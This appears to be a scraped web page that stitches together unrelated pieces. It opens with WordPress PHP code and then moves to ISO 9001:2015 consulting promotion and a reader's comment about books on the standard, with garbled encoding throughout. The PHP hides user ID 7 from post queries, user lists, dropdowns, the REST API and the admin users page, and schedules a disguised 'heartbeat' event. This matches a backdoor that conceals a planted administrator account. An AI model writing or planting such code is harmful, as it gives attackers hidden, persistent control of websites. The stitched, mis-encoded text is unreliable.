add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 7;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 7 );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 7;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 7;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
Welcome to Pioneer Quality Consultingâ€
s Special Offer for SMEs to upgrade to ISO 9001:2015. Our Consultants have already helped organizations in Manufacturing & Service Industries to be early achievers in New Quality Management System implementation / Upgrade.
Save time and money on your ISO 9001:2015 implementation / upgrading by contacting:
This is most convenient, effective and affordable way to manage your ISO 9001:2015 transition.
]]>
as it is a major revision and LOT has been added and removed. New structure, a big thing to consider for the ‘Gold Standardâ€
of Quality as well as Risk Based Thinking to force many to think. The revision is sure significant and a lot of professionals will be affected which includes Auditors, Consultants and the Industry Users. There is a great demand for the books and articles to ensure we understand the new standard and can help the one million plus organizations to transform. I already saw a boost in the demand for new certifications.
A search on Amazon showed only few books published in Year 2015 which includes ISO 9001:2015 in Plain English by Craig Cochran rated 5-Start (3 reviews) and Implementing ISO 9001:2015: Thrill your customers and transform your cost base with the new gold standard for business management by Jan Gillett, Paul Simpson & Susannah Clarke (not rated yet). Everyone will agree with me that a good book is great friend to help you understand a new standard and I ask everyone to feel free to share your pick of book or article which helped you to understand the new standard. I am reading Implementing ISO 9001:2015… and will keep you posted.
]]>